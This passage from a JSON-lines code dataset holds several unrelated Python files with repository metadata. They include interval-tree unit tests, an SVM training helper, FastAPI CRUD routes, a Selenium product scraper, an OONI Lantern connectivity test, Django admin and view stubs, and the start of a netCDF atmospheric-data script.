stop_offset=3),\n ]\n\n\n@pytest.mark.parametrize(\"accelerated\", [True, False])\ndef test___init__(accelerated):\n make_interval_tree(accelerated=accelerated, populated=False)\n make_interval_tree(accelerated=accelerated, populated=True)\n\n\n@pytest.mark.parametrize(\"accelerated\", [True, False])\ndef test___iter__(accelerated):\n interval_tree = make_interval_tree(accelerated=accelerated, populated=True)\n assert [interval for interval in interval_tree] == [\n Interval(start_offset=0, stop_offset=3),\n Interval(start_offset=1, stop_offset=2),\n Interval(start_offset=1, stop_offset=3),\n Interval(start_offset=2, stop_offset=5),\n Interval(start_offset=6, stop_offset=9),\n ]\n iterator = iter(interval_tree)\n assert next(iterator) == Interval(start_offset=0, stop_offset=3)\n\n\n@pytest.mark.parametrize(\"accelerated\", [True, False])\ndef test___len__(accelerated):\n interval_tree = make_interval_tree(accelerated=accelerated, populated=False)\n assert len(interval_tree) == 0\n interval_tree = make_interval_tree(accelerated=accelerated, populated=True)\n assert len(interval_tree) == 5\n\n\n@pytest.mark.parametrize(\"accelerated\", [True, False])\ndef test___setitem__(accelerated):\n interval_tree = make_interval_tree(accelerated=accelerated, populated=True)\n interval_tree[-1] = Interval(-1, 4)\n assert [interval for interval in interval_tree] == [\n Interval(start_offset=-1, stop_offset=4),\n Interval(start_offset=0, stop_offset=3),\n Interval(start_offset=1, stop_offset=2),\n Interval(start_offset=1, stop_offset=3),\n Interval(start_offset=2, stop_offset=5),\n ]\n interval_tree[:3] = [Interval(100, 200)]\n assert [interval for interval in interval_tree] == [\n Interval(start_offset=1, stop_offset=3),\n Interval(start_offset=2, stop_offset=5),\n 
Interval(start_offset=100, stop_offset=200),\n ]\n\n\n@pytest.mark.parametrize(\"accelerated\", [True, False])\ndef test___sub__(accelerated):\n interval_tree = make_interval_tree(\n accelerated=accelerated,\n intervals=[Interval(0, 16), Interval(5, 12), Interval(-2, 8)],\n )\n interval = Interval(5, 10)\n result = interval_tree - interval\n assert result[:] == [\n Interval(-2, 5),\n Interval(0, 5),\n Interval(10, 12),\n Interval(10, 16),\n ]\n\n\n@pytest.mark.parametrize(\"accelerated\", [True, False])\ndef test_find_intersection_with_offset(accelerated):\n iterations = 10\n count, range_ = 10, 15\n for i in range(iterations):\n print(\"Iteration:\", i)\n intervals = make_random_intervals(count=count, range_=range_)\n interval_tree = make_interval_tree(accelerated=accelerated, intervals=intervals)\n optimized = 0.0\n brute_force = 0.0\n for offset in range(range_):\n with uqbar.io.Timer() as timer:\n found_by_search = set(interval_tree.find_intersection(offset))\n optimized += timer.elapsed_time\n with uqbar.io.Timer() as timer:\n found_by_brute_force = set()\n for _ in interval_tree:\n if _.start_offset <= offset < _.stop_offset:\n found_by_brute_force.add(_)\n brute_force += timer.elapsed_time\n assert found_by_search == found_by_brute_force\n factor = \"{:0.6f}\".format(optimized / brute_force) if brute_force else \"NaN\"\n print(f\"D: {factor} O: {optimized} B: {brute_force}\")\n\n\n@pytest.mark.parametrize(\"accelerated\", [True, False])\ndef test_find_intersection_with_interval(accelerated):\n iterations = 10\n count, range_ = 10, 15\n target_intervals = make_target_intervals(range_=range_)\n for i in range(iterations):\n print(\"Iteration:\", i)\n intervals = make_random_intervals(count=count, range_=range_)\n interval_tree = make_interval_tree(accelerated=accelerated, intervals=intervals)\n optimized = 0.0\n brute_force = 0.0\n for target_interval in target_intervals:\n with uqbar.io.Timer() as timer:\n found_by_search = set(interval_tree.find_intersection(target_interval))\n optimized += timer.elapsed_time\n with uqbar.io.Timer() as timer:\n found_by_brute_force = set()\n for _ in interval_tree:\n if (\n _.start_offset <= target_interval.start_offset\n and target_interval.start_offset < _.stop_offset\n ):\n found_by_brute_force.add(_)\n elif (\n target_interval.start_offset <= _.start_offset\n and _.start_offset < target_interval.stop_offset\n ):\n found_by_brute_force.add(_)\n brute_force += timer.elapsed_time\n assert found_by_search == found_by_brute_force\n factor = \"{:0.6f}\".format(optimized / brute_force) if brute_force else \"NaN\"\n print(f\"D: {factor} O: {optimized} B: {brute_force}\")\n\n\n@pytest.mark.parametrize(\"accelerated\", [True, False])\ndef test_find_intervals_starting_at(accelerated):\n iterations = 100\n count, range_ = 10, 15\n for i in range(iterations):\n print(\"Iteration:\", i)\n intervals = make_random_intervals(count=count, range_=range_)\n interval_tree = make_interval_tree(accelerated=accelerated, intervals=intervals)\n for offset in range(range_):\n found_by_search = set(interval_tree.find_intervals_starting_at(offset))\n found_by_brute_force = set()\n for _ in interval_tree:\n if _.start_offset == offset:\n found_by_brute_force.add(_)\n assert found_by_search == found_by_brute_force\n\n\n@pytest.mark.parametrize(\"accelerated\", [True, False])\ndef test_find_intervals_stopping_at(accelerated):\n iterations = 100\n count, range_ = 10, 15\n for i in range(iterations):\n print(\"Iteration:\", i)\n intervals = make_random_intervals(count=count, 
range_=range_)\n interval_tree = make_interval_tree(accelerated=accelerated, intervals=intervals)\n for offset in range(range_):\n found_by_search = set(interval_tree.find_intervals_stopping_at(offset))\n found_by_brute_force = set()\n for _ in interval_tree:\n if _.stop_offset == offset:\n found_by_brute_force.add(_)\n assert found_by_search == found_by_brute_force\n\n\n@pytest.mark.parametrize(\"accelerated\", [True, False])\ndef test_get_moment_at(accelerated):\n iterations = 100\n count, range_ = 10, 15\n for i in range(iterations):\n print(\"Iteration:\", i)\n intervals = make_random_intervals(count=count, range_=range_)\n interval_tree = make_interval_tree(accelerated=accelerated, intervals=intervals)\n fixtures = make_moment_fixtures(range_=range_, intervals=intervals)\n for offset in range(range_):\n overlaps, starts, stops = fixtures[offset]\n expected = Moment(\n overlap_intervals=overlaps,\n start_offset=offset,\n start_intervals=starts,\n stop_intervals=stops,\n interval_tree=interval_tree,\n )\n actual = interval_tree.get_moment_at(offset)\n assert expected.interval_tree is actual.interval_tree\n assert expected.start_offset == actual.start_offset\n assert expected.start_intervals == actual.start_intervals\n assert expected.stop_intervals == actual.stop_intervals\n assert expected.overlap_intervals == actual.overlap_intervals\n\n\n@pytest.mark.parametrize(\"accelerated\", [True, False])\ndef test_get_start_offset(accelerated):\n iterations = 100\n count, range_ = 10, 15\n for i in range(iterations):\n print(\"Iteration:\", i)\n intervals = make_random_intervals(count=count, range_=range_)\n interval_tree = make_interval_tree(accelerated=accelerated, intervals=intervals)\n expected_offsets = make_expected_start_offsets(\n range_=range_, intervals=intervals\n )\n for interval in sorted(intervals):\n print(\" Interval:\", interval)\n for offset in range(-1, range_ + 1):\n print(\" Offset:\", offset)\n print(\" :\", expected_offsets[offset])\n expected_before, expected_after = expected_offsets[offset]\n actual_before = interval_tree.get_start_offset_before(offset)\n actual_after = interval_tree.get_start_offset_after(offset)\n assert expected_before == actual_before, offset\n assert expected_after == actual_after, offset\n\n\n@pytest.mark.parametrize(\"accelerated\", [True, False])\ndef test_index(accelerated):\n intervals = make_intervals()\n interval_tree = make_interval_tree(accelerated=accelerated, populated=True)\n assert interval_tree.index(intervals[0]) == 0\n assert interval_tree.index(intervals[1]) == 2\n assert interval_tree.index(intervals[2]) == 1\n assert interval_tree.index(intervals[3]) == 3\n assert interval_tree.index(intervals[4]) == 4\n with pytest.raises(ValueError):\n interval = Interval(-100, 100)\n interval_tree.index(interval)\n\n\n@pytest.mark.parametrize(\"accelerated\", [True, False])\ndef test_insert(accelerated):\n interval_tree = make_interval_tree(accelerated=accelerated, populated=False)\n interval_tree.add(Interval(1, 3))\n interval_tree.update((Interval(0, 4), Interval(2, 6)))\n assert interval_tree[:] == [\n Interval(start_offset=0, stop_offset=4),\n Interval(start_offset=1, stop_offset=3),\n Interval(start_offset=2, stop_offset=6),\n ]\n\n\n@pytest.mark.parametrize(\"accelerated\", [True, False])\ndef test_iterate_moments(accelerated):\n interval_tree = make_interval_tree(accelerated=accelerated, populated=True)\n moments = list(interval_tree.iterate_moments())\n assert [x.start_offset for x in moments] == [0, 1, 2, 6]\n moments = 
list(interval_tree.iterate_moments(reverse=True))\n assert [x.start_offset for x in moments] == [6, 2, 1, 0]\n\n\n@pytest.mark.parametrize(\"accelerated\", [True, False])\ndef test_remove(accelerated):\n intervals = make_intervals()\n interval_tree = make_interval_tree(accelerated=accelerated, populated=True)\n assert list(interval_tree) == sorted(intervals)\n with pytest.raises(ValueError):\n interval_tree.remove(intervals[1:-1])\n assert list(interval_tree) == sorted(intervals)\n for interval in interval_tree[1:-1]:\n interval_tree.remove(interval)\n assert interval_tree[:] == [\n Interval(start_offset=0, stop_offset=3),\n Interval(start_offset=6, stop_offset=9),\n ]\n\n\ndef test_get_offset_after():\n intervals = [\n Interval(0, 3),\n Interval(1, 3),\n Interval(1, 2),\n Interval(2, 5),\n Interval(5, 10),\n Interval(5, 12),\n Interval(6, 9),\n Interval(13, 15),\n ]\n expected = [\n (-2, 0.0),\n (-1, 0.0),\n (0, 1.0),\n (1, 2.0),\n (2, 3.0),\n (3, 5.0),\n (4, 5.0),\n (5, 6.0),\n (6, 9.0),\n (7, 9.0),\n (8, 9.0),\n (9, 10.0),\n (10, 12.0),\n (11, 12.0),\n (12, 13.0),\n (13, 15.0),\n (14, 15.0),\n (15, None),\n (16, None),\n ]\n for _ in range(10):\n interval_tree = IntervalTree(intervals)\n actual = [(i, interval_tree.get_offset_after(i)) for i in range(-2, 17)]\n assert actual == expected\n random.shuffle(intervals)\n","repo_name":"josiah-wolf-oberholtzer/supriya","sub_path":"tests/utils/test_intervals_IntervalTree.py","file_name":"test_intervals_IntervalTree.py","file_ext":"py","file_size_in_byte":15467,"program_lang":"python","lang":"en","doc_type":"code","stars":224,"dataset":"github-code","pt":"53"} +{"seq_id":"15298077006","text":"\nimport sys\nimport os\nimport pickle\n\n\nfrom sklearn.cluster import KMeans\nfrom sklearn.svm import SVC\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nfrom sklearn.metrics import confusion_matrix,accuracy_score\n\n\n\ndef train_clustering(input_data, clustering_calgo = KMeans , K = 256):\n \"\"\"\n input_data: The data which we apply clustering on.\n clustering_algo: The algorithm for clustering\n K : number of clusters \n \"\"\"\n model_name = 'kmeans_model.pkl'\n if os.path.exists(model_name): \n model = pickle.load(open(model_name, 'rb'))\n return model \n else: \n model = clustering_calgo(n_clusters = K) # %56 with K=128\n model.fit(input_data)\n pickle.dump(model, open(model_name, 'wb'))\n return model\n\n\ndef SVM(preprocessed_image, image_labels):\n \"\"\"\n Load SVM if a trained model file was available, \n otherwise, train a new one using Grid Search \n with Cross Validation of 5 folds to find the \n most accurate hyperparameter for the \n classification.\n \"\"\"\n\n x_train, x_test, y_train, y_test = train_test_split(preprocessed_image, image_labels,\n test_size = .2, random_state = 14)\n grid = { \n 'C': [2**(-5), 2**(-4), 2**(-3), 2**(-2), 2**(-1), 1, 2, 4 ,8 ,16],\n 'kernel': ['linear', 'poly', 'rbf'],\n }\n pickle_file_name = 'best_param.pkl'\n model_name = 'model.sav'\n if os.path.exists(model_name): \n svm_clf = pickle.load(open(model_name, 'rb'))\n y_pred = svm_clf.predict(x_test)\n print(\"The test accuracy of the SVM model is: %\", accuracy_score(y_test, y_pred)*100)\n return svm_clf\n if os.path.exists(pickle_file_name):\n with open(pickle_file_name, 'rb') as handle:\n best_param = pickle.load(handle)\n svm_clf = SVC(**best_param)\n svm_clf.fit(x_train, y_train)\n y_pred = svm_clf.predict(x_test)\n print(\"The test accuracy of the SVM model is: %\",accuracy_score(y_test, y_pred)*100)\n pickle.dump(svm_clf, 
open(model_name, 'wb'))\n return svm_clf\n else: \n svm_cv = GridSearchCV(estimator=SVC(), param_grid=grid, cv= 5)\n svm_cv.fit(x_train, y_train)\n best_param = svm_cv.best_params_\n with open(pickle_file_name, 'wb') as handle:\n pickle.dump(svm_cv.best_params_, handle, protocol=pickle.HIGHEST_PROTOCOL)\n svm_clf = SVC(**best_param)\n svm_clf.fit(x_train, y_train)\n y_pred = svm_clf.predict(x_test)\n print(\"The test accuracy of the SVM model is: %\",accuracy_score(y_test, y_pred)*100)\n pickle.dump(svm_clf, open(model_name, 'wb'))\n return svm_clf","repo_name":"MahdiRahbar/Comic_Book_Classification","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13396688275","text":"from typing import Any, List\n\nfrom fastapi import APIRouter, Depends, HTTPException, status\nfrom sqlalchemy.orm import Session\n\nfrom app import crud, models, schemas\nfrom app.api import deps\n\nrouter = APIRouter()\n\n\n@router.get(\"/\", response_model=List[schemas.Subsidiary])\ndef read_subsidiaries(\n skip: int = 0,\n limit: int = 50,\n current_user: models.User = Depends(deps.get_current_active_user),\n db: Session = Depends(deps.get_db)\n) -> Any:\n \"\"\"\n Read subsidiaries.\n \"\"\"\n subsidiaries = crud.subsidiary.get_multi(db, skip=skip, limit=limit)\n\n return subsidiaries\n\n\n@router.post(\"/\", response_model=schemas.Subsidiary)\ndef create_subsidiary(\n subsidiary_in: schemas.SubsidiaryCreate,\n current_user: models.User = Depends(deps.get_current_active_user),\n db: Session = Depends(deps.get_db)\n) -> Any:\n \"\"\"\n Create subsidiary.\n \"\"\"\n subsidiary = crud.subsidiary.create(db, obj_in=subsidiary_in)\n\n return subsidiary\n\n\n@router.get(\"/{subsidiary_id}\", response_model=schemas.Subsidiary)\ndef read_subsidiary(\n subsidiary_id: int,\n current_user: models.User = Depends(deps.get_current_active_user),\n db: Session = Depends(deps.get_db)\n) -> Any:\n \"\"\"\n Read subsidiary by id.\n \"\"\"\n subsidiary = crud.subsidiary.get(db, id=subsidiary_id)\n\n if not subsidiary:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=\"La sucursal no existe\")\n\n return subsidiary\n\n\n@router.delete(\"/{subsidiary_id}\", response_model=schemas.Subsidiary)\ndef delete_subsidiary(\n subsidiary_id: int,\n current_user: models.User = Depends(deps.get_current_active_user),\n db: Session = Depends(deps.get_db)\n) -> Any:\n \"\"\"\n Delete subsidiary.\n \"\"\"\n subsidiary = crud.subsidiary.get(db, id=subsidiary_id)\n\n if not subsidiary:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=\"La sucursal no existe\")\n\n subsidiary = crud.subsidiary.remove(db, id=subsidiary_id)\n\n return subsidiary\n\n\n@router.patch(\"/{subsidiary_id}\", response_model=schemas.Subsidiary)\ndef update_subsidiary(\n subsidiary_id: int,\n subsidiary_in: schemas.SubsidiaryUpdate,\n current_user: models.User = Depends(deps.get_current_active_user),\n db: Session = Depends(deps.get_db)\n) -> Any:\n \"\"\"\n Update subsidiary.\n \"\"\"\n subsidiary = crud.subsidiary.get(db, id=subsidiary_id)\n\n if not subsidiary:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=\"La sucursal no existe\")\n\n subsidiary = crud.subsidiary.update(db, db_obj=subsidiary, obj_in=subsidiary_in)\n\n return 
subsidiary\n","repo_name":"WilfredoHQ/fastapi-money-transfer","sub_path":"app/api/api_v1/endpoints/subsidiaries.py","file_name":"subsidiaries.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74023457448","text":"import sys\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\n\nfrom selenium.webdriver.chrome.service import Service\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.chrome.options import Options\n\nimport time \nfrom selenium.webdriver.common.action_chains import ActionChains\n\nimport pandas as pd\n#import openpyxl\n\nproduct_links = []\nproduct_names = []\nproduct_prices = []\nproduct_descriptions = []\nproduct_imglinks = []\n\noptions = Options()\noptions.add_argument(\"start-maximized\")\noptions.add_experimental_option('excludeSwitches', ['enable-logging'])\ndriver = webdriver.Chrome(service=Service(ChromeDriverManager().install()), options=options)\n\nfor page in range(1, 5):\n\tpage_url = \"https://www.bradburnhome.com/collections/casual?page=\" + str(page)\n\tprint(page)\n \n\tdriver.get(page_url)\n\n\tproducts = driver.find_elements(By.CLASS_NAME, \"eight\")\n\tprint(len(products))\n\n\t\n\tfor i in range(len(products)):\n\t\tproduct_link = products[i].find_element(By.TAG_NAME, 'a').get_attribute('href')\n\t\tprint(product_link)\n\t\tproduct_links.append(product_link)\n\nfor i in range(len(product_links)):\n\tdriver.get(product_links[i])\n\tproduct_name = driver.find_element(By.CLASS_NAME, \"product_name\").get_attribute('innerHTML')\n\tproduct_names.append(product_name)\n\n\tproduct_price = driver.find_element(By.CLASS_NAME, \"money\").get_attribute('innerHTML')\n\tproduct_prices.append(product_price)\n\n\tproduct_imglink = driver.find_element(By.CLASS_NAME, \"fancybox\").get_attribute('href')\n\tproduct_imglinks.append(product_imglink)\n\n\tproduct_description_driver = driver.find_element(By.CLASS_NAME, \"description\")\n\tproduct_description = product_description_driver.find_element(By.TAG_NAME, 'p').get_attribute('innerHTML')\n\tproduct_descriptions.append(product_description)\n\n\tproduct_table = product_description_driver.find_element(By.TAG_NAME, 'table')\n\tproduct_table_rows = product_table.find_elements(By.TAG_NAME, 'tr')\n\n\n\t# for index in range(len(product_table_rows)):\n\t# \tproduct_table_cols = product_table_rows[index].find_elements(By.TAG_NAME, 'td')\n\t# \tproduct_table_col_name = product_table_cols[0].text\n\t# \tproduct_table_col_content = product_table_cols[1].text\n\n\n\t\n\n\n\n\n\n#product_titles.append(product_title)\n\ndf = pd.DataFrame({'product_name': product_names, 'product_price': product_prices, 'product_description': product_descriptions, 'product_imglink': product_imglinks}) # Create a DF with the lists\n\nwith pd.ExcelWriter('output1.xlsx') as writer:\n df.to_excel(writer, sheet_name='Sheet1')\n\n","repo_name":"Jane011223/Scraping-templates-using-selenium-python","sub_path":"selenium-general.py","file_name":"selenium-general.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"13665620962","text":"import h5py as h5\nimport numpy as np\nimport os.path as osp\nimport glob\nimport tqdm\nimport argparse\n\ndef get_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--feat_folder',\n 
default='/home/pardogl/datasets/movies/youtube/',\n type=str,\n help='Path to folder contain all video folders')\n parser.add_argument(\n '--out_path',\n default='/home/pardogl/datasets/movies/',\n type=str)\n parser.add_argument(\n '--suffix_features',\n type=str, help='Suffix of npy features name')\n parser.add_argument(\n '--out_name',\n default='/home/pardogl/datasets/movies/',\n type=str)\n return parser.parse_args()\n\n\ndef npy2h5(feat_folder, out_path, suffix_features, out_name):\n features_path = (f'{feat_folder}/*')\n videos = glob.glob(f'{features_path}/*{suffix_features}.npy')\n print(f'{len(videos)} features found')\n features = []\n names = []\n for video in tqdm.tqdm(videos):\n feature = np.load(open(video,'rb'))\n features.append(feature)\n name = osp.basename(video).replace(f'{suffix_features}.npy','')\n names.append(name)\n\n print('Saving hdf5 file')\n with h5.File(f'{out_path}/{out_name}.h5','w') as f:\n for name, feature in tqdm.tqdm(zip(names, features), total=len(names)):\n f.create_dataset(name, data=feature, chunks=True)\n\nif __name__ == \"__main__\":\n args = get_arguments()\n npy2h5(args.feat_folder, args.out_path, args.suffix_features, args.out_name)\n","repo_name":"PardoAlejo/head-pose-feature-extractor","sub_path":"code/npy2hdf5.py","file_name":"npy2hdf5.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16490164067","text":"import json\n\nfrom django.shortcuts import (\n render,\n)\nfrom django.views import (\n View,\n)\n\n\nclass Task1View(View):\n \"\"\"\n Вывести список всех рецептов. Список должен содержать информацию о самом рецепте, авторе\n \"\"\"\n\n def get(self, request, **kwargs):\n data = {\n 'response': 'some data task 1',\n }\n\n return render(request, 'task.html', {'json_data': json.dumps(data)})\n\n\nclass Task2View(View):\n \"\"\"\n Вывести детальную информацию рецепта. Нужно получить информацию о самом рецепте, о шагах приготовления, списке\n необходимых продоктов для приготовления\n \"\"\"\n\n def get(self, request, **kwargs):\n data = {\n 'response': 'some data task 2',\n }\n\n return render(request, 'task.html', {'json_data': json.dumps(data)})\n\n\nclass Task3View(View):\n \"\"\"\n Вывести список рецептов, аналогичный заданию 1, только дополнительно должно быть выведено количество лайков. Сам\n список должен быть отсортирован по количеству лайков по убыванию\n \"\"\"\n\n def get(self, request, **kwargs):\n data = {\n 'response': 'some data task 3',\n }\n\n return render(request, 'task.html', {'json_data': json.dumps(data)})\n\n\nclass Task4View(View):\n \"\"\"\n Вывести объединенный список TOP 3 авторов и TOP 3 голосующих с количеством рецептов для первых и количеством\n голосов для вторых. В выборке должен быть указан тип в отдельной колонкке - Автор или Пользователь.\n \"\"\"\n\n def get(self, request, **kwargs):\n data = {\n 'response': 'some data task 4',\n }\n\n return render(request, 'task.html', {'json_data': json.dumps(data)})\n\n\nclass Task5View(View):\n \"\"\"\n Все продукты указаны для приготовления одной порции блюда. 
Необходимо вывести список необходимых продуктов для\n приготовления самостоятельно выбранного блюда в количестве 5-ти порций\n \"\"\"\n\n def get(self, request, **kwargs):\n data = {\n 'response': 'some data task 5',\n }\n\n return render(request, 'task.html', {'json_data': json.dumps(data)})\n\n\n\n","repo_name":"sandanilenko/peerocks","sub_path":"peerocks/peerocks/apps/common/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2768,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7577543025","text":"import os\nimport distutils.spawn\n\nfrom twisted.internet import defer, reactor\nfrom twisted.internet.endpoints import TCP4ClientEndpoint\nfrom twisted.web.client import ProxyAgent, readBody\nfrom twisted.python import usage\n\nfrom ooni.templates.process import ProcessTest, ProcessDirector\nfrom ooni.utils import log, net\nfrom ooni.errors import handleAllFailures\n\nclass LanternNotInstalled(Exception):\n pass\n\nclass UsageOptions(usage.Options):\n optParameters = [\n ['url', 'u', net.GOOGLE_HUMANS[0],\n 'Specify the URL to fetch over lantern (default: http://www.google.com/humans.txt).'],\n ['expected-body', 'e', net.GOOGLE_HUMANS[1],\n 'Specify the beginning of the expected body in the response (default: ' + net.GOOGLE_HUMANS[1] + ').']\n ]\n\nclass LanternTest(ProcessTest):\n \"\"\"\n This class tests Lantern (https://getlantern.org).\n\n test_lantern_circumvent\n Starts Lantern on Linux in --headless mode and\n determine if it bootstraps successfully or not.\n Then, make a HTTP request for http://google.com\n and records the response body or failure string.\n\n \"\"\"\n\n name = \"Lantern Circumvention Tool Test\"\n description = \"Bootstraps Lantern, connects to a URL and verifies if it \"\\\n \"contains the expected input.\"\n author = \"Aaron Gibson\"\n version = \"0.1.0\"\n timeout = 120\n usageOptions = UsageOptions\n\n def requirements(self):\n if not distutils.spawn.find_executable(\"lantern\"):\n raise LanternNotInstalled('lantern is not installed')\n\n def setUp(self):\n self.report['body'] = None\n self.report['failure'] = None\n self.report['success'] = None\n self.report['default_configuration'] = True\n\n self.command = [distutils.spawn.find_executable(\"lantern\"), \"--headless\"]\n self.bootstrapped = defer.Deferred()\n self.exited = False\n\n self.url = self.localOptions['url']\n if self.url != net.GOOGLE_HUMANS[0]:\n self.report['default_configuration'] = False\n\n if self.localOptions['expected-body'] != net.GOOGLE_HUMANS[1]:\n self.report['default_configuration'] = False\n\n def stop(self, reason=None):\n if not self.exited:\n self.processDirector.close()\n self.processDirector.transport.signalProcess('TERM')\n self.exited = True\n\n def handleRead(self, stdout=None, stderr=None):\n \"\"\"\n This is called with each chunk of data from stdout and stderr.\n \"\"\"\n if not self.bootstrapped.called and \"Successfully dialed via\" in self.processDirector.stdout:\n log.msg(\"Lantern connection successful\")\n self.processDirector.cancelTimer()\n self.bootstrapped.callback(\"bootstrapped\")\n\n def test_lantern_circumvent(self):\n def addResultToReport(result):\n self.report['body'] = result\n if result.startswith(self.localOptions['expected-body']):\n log.msg(\"Got the HTTP response body I expected!\")\n self.report['success'] = True\n else:\n self.report['success'] = False\n\n def addFailureToReport(failure):\n log.err(\"Failed to connect to lantern\")\n log.failure(failure)\n 
self.report['failure'] = handleAllFailures(failure)\n self.report['success'] = False\n\n def doRequest(noreason):\n proxyEndpoint = TCP4ClientEndpoint(reactor, '127.0.0.1', 8787)\n agent = ProxyAgent(proxyEndpoint, reactor)\n log.msg(\"Doing HTTP request via Lantern (127.0.0.1:8787) for %s\" % self.url)\n request = agent.request(\"GET\", self.url)\n request.addCallback(readBody)\n request.addCallback(addResultToReport)\n request.addCallback(self.processDirector.close)\n return request\n\n self.bootstrapped.addCallback(doRequest)\n self.bootstrapped.addErrback(addFailureToReport)\n self.bootstrapped.addBoth(self.stop)\n self.d = self.run(self.command, env=os.environ, usePTY=1)\n return self.d\n","repo_name":"ooni/probe-legacy","sub_path":"ooni/nettests/third_party/lantern.py","file_name":"lantern.py","file_ext":"py","file_size_in_byte":4108,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"20857349369","text":"from django.contrib import admin\nfrom writer.models import Section, Writer\n\nclass SectionAdmin(admin.ModelAdmin):\n search_fields = ['section', 'section_slug']\n list_display = ['section', 'section_slug', 'display_count']\n \nclass WriterAdmin(admin.ModelAdmin):\n search_fields = ['first_name', 'last_name', 'name_slug']\n #prepopulated_fields = {'name_slug': ('first_name', 'last_name')}\n fieldsets = (\n ('Section', {\n 'fields': ('section',)\n }),\n ('Writer', {\n 'fields': ('first_name', 'last_name', 'name_slug', 'title','photo', 'on_staff')\n }),\n )\n list_display = ['last_name', 'first_name', 'section', 'name_slug', 'title', 'on_staff']\n list_editable = ['on_staff']\n list_filter = ['on_staff', 'section']\n \n#class SectionChoiceAdmin(admin.ModelAdmin):\n# search_fields = ['section',]\n# list_display = ['section', 'display_count']\n \nadmin.site.register(Section, SectionAdmin)\nadmin.site.register(Writer, WriterAdmin)\n","repo_name":"smosqueda/djangocms-sarah","sub_path":"writer/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24260126846","text":"import json\nimport argparse\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--benchmark\", type=str, default=\"tpch\", choices=['tpch', 'santos_large_tpch', 'tpch_groundtruth', 'tpch_small', 'tpch_large',\n 't2d_gold', 'TUS_t2d_gold', 'wdc_t2d_gold'])\n hp = parser.parse_args()\n\n with open(\"%s/runtimes_genT.json\"%(hp.benchmark)) as timesJson:\n all_runtimes = json.load(timesJson)\n \n total_runtime = []\n for sTable, timesDict in all_runtimes.items():\n if '.csv' not in sTable: continue\n if \"all\" not in timesDict or \"table_integration\" not in timesDict: continue\n total_runtime.append(timesDict[\"all\"]+timesDict[\"table_integration\"])\n print(\"For %d Source Tables, the Average Runtimes (sec) is %.3f\" % (len(total_runtime), sum(total_runtime)/len(total_runtime)))","repo_name":"northeastern-datalab/gen-t","sub_path":"code/experiment_logs/analyzeRuntimes.py","file_name":"analyzeRuntimes.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27487938484","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 4 11:11:48 2019\n\n@author: anthonys\n\"\"\"\n\n\n\n\n\n#from netCDF4 import Dataset\nimport numpy as np \n#import struct \n#import netCDF4\nfrom netCDF4 
import Dataset\n#import netCDF4 as nc\n#import collections\nimport matplotlib.pyplot as plt\nplt.rcParams.update({'figure.max_open_warning': 0})\n#from scipy.io import netcdf\n#import scipy as sp\n#import glob\n#import os\n#import sys\nfrom mpl_toolkits import mplot3d\nfrom scipy.optimize import curve_fit\nfrom scipy.interpolate import interp1d\nimport time\n#import pkgutil\n#import collections\n#from collections import Counter\nfrom scipy.spatial import ConvexHull\nimport cProfile\n\n#import overlap_calculation\n\nstart=time.time()\n\n\n#############################################################################\n\n# definitions\ndef pyth(u,v): # magnitude\n return np.sqrt(u*u+v*v)\n \n\ndef rb1(grad,ht,w,one,width):\n #return 1/(abs(grad)*ht*(1/width*np.maximum(abs(w),one))+1)\n return 1/ ( (abs(grad)*ht) / (width*np.maximum(abs(w),one) ) +1 )\n\n\n\n################################################################################\n# importing files\n\nbomexd = Dataset(\"/data/bomex/bomex.default.0000000.nc\",\"r\")\nbomexql = Dataset(\"/data/bomex/bomex.ql.0000000.nc\",\"r\")\nbomexqlcore = Dataset(\"/data/bomex/bomex.qlcore.0000000.nc\",\"r\")\nbomextrack18 = Dataset('/data/bomex/l.0001800.track.nc','r')\nbomextrack36 = Dataset('/data/bomex/l.0003600.track.nc','r')\nbomextrack54 = Dataset('/data/bomex/l.0005400.track.nc','r')\nbomextrack72 = Dataset('/data/bomex/l.0007200.track.nc','r')\nbomextrack90 = Dataset('/data/bomex/l.0009000.track.nc','r')\nbomextrack108 = Dataset('/data/bomex/l.0010800.track.nc','r')\nbomextrack126 = Dataset('/data/bomex/l.0012600.track.nc','r')\nbomextrack144 = Dataset('/data/bomex/l.0014400.track.nc','r')\nbomextrack162 = Dataset('/data/bomex/l.0016200.track.nc','r')\nbomextrack180 = Dataset('/data/bomex/l.0018000.track.nc','r')\nbomextrack198 = Dataset('/data/bomex/l.0019800.track.nc','r')\nbomextrack216 = Dataset('/data/bomex/l.0021600.track.nc','r')\n\nbomextrack342 = Dataset('/data/bomex/l.0034200.track.nc','r')\nbomextrack360 = Dataset('/data/bomex/l.0036000.track.nc','r')\n\n\nricod = Dataset(\"/data/rico/rico.default.0000000.nc\",\"r\")\nricoql = Dataset(\"/data/rico/rico.ql.0000000.nc\",\"r\")\nricoqlcore = Dataset(\"/data/rico/rico.qlcore.0000000.nc\",\"r\")\nricotrack36 = 